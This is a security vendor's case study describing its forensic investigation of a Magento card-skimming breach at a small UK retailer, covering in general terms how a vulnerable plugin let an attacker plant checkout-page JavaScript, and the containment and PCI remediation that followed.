Acquirer-Led Investigation Uncovers Web Skimming Attack

About the Client

Our client is a small UK-based e-commerce retailer specialising in high-end outdoor equipment. With 20 employees, the business relies entirely on online sales via a Magento 2 website and uses Stripe as its payment processor. The merchant had a clean history of compliance but lacked in-house cybersecurity expertise. (Client name protected for confidentiality.)

The Challenge: Evidence of a Card Skimming Breach

The Initial Alert:
The client was contacted by their acquiring bank after a card scheme raised a Common Point of Purchase (CPP) alert, linking a small cluster of fraudulent transactions to their website. No visible signs of compromise had been detected internally.

The Suspicion:
Due to the nature of the transactions and timeline, the card scheme required an Acquirer-Led Investigation (ALI) to determine whether the merchant environment had been compromised and whether cardholder data was at risk.

The Business Risks:

• Potential compromise of customer payment data via undetected web skimming
• Regulatory exposure if data protection obligations were breached
• PCI DSS compliance impact if weaknesses were found
• Risk of reputational damage and increased chargebacks if breach was confirmed

The Solution: Acquirer-Led Investigation by Foregenix

• Step 1: Engagement & Evidence Collection

  The acquiring bank formally referred the case to Foregenix as an ALI provider. The Cyber Defence Team contacted the merchant within hours and issued a clear evidence request covering web server logs, application codebase, admin access logs, and recent change records.

• Step 2: Forensic Review of the Website

  Our team performed source code analysis and log review on the client's Magento site. Within 24 hours, we identified a JavaScript skimmer injected via a third-party plugin that had not been updated in over a year. The skimmer selectively activated on the checkout page for non-admin users, avoiding internal detection.

• Step 3: Root Cause Analysis

  The attack vector was linked to a vulnerable plugin that allowed unauthenticated file uploads. The attacker used this to plant malicious JavaScript code and exfiltrate cardholder data in real time to an external drop server.

• Step 4: Risk Assessment & Reporting

  We assessed the timeframe of the compromise, the volume of potentially exposed cardholder data, and the merchant’s cooperation. The final ALI report was delivered to the acquirer, confirming a confirmed compromise, detailing the data-at-risk, and recommending mitigation.

The Results: Risk Contained and Compliance Restored

• Compromise Confirmed: The attack was active for approx. 6 weeks before detection

• Data-at-Risk Identified: All transactions during the compromise window were clearly defined

• Rapid Containment: The malicious code was removed within 48 hours of ALI initiation

• Remediation Implemented:

  • Outdated plugin removed and replaced

  • Admin credentials rotated

  • File upload restrictions enforced

  • Logging and change management enhanced

• PCI DSS Remediation Confirmed: Merchant resumed full compliance under acquirer oversight

Why Foregenix Cyber Defence Team

The merchant had no prior relationship with Foregenix, but chose to proceed with the investigation upon the acquirer’s recommendation due to our status as an approved Acquirer-Led Investigation provider. Foregenix’s speed of engagement, clear communication, and deep experience with Magento-based breaches stood out immediately. The Cyber Defence Team guided the client through a full review, mitigation, and restoration of trust with their acquirer and PSP.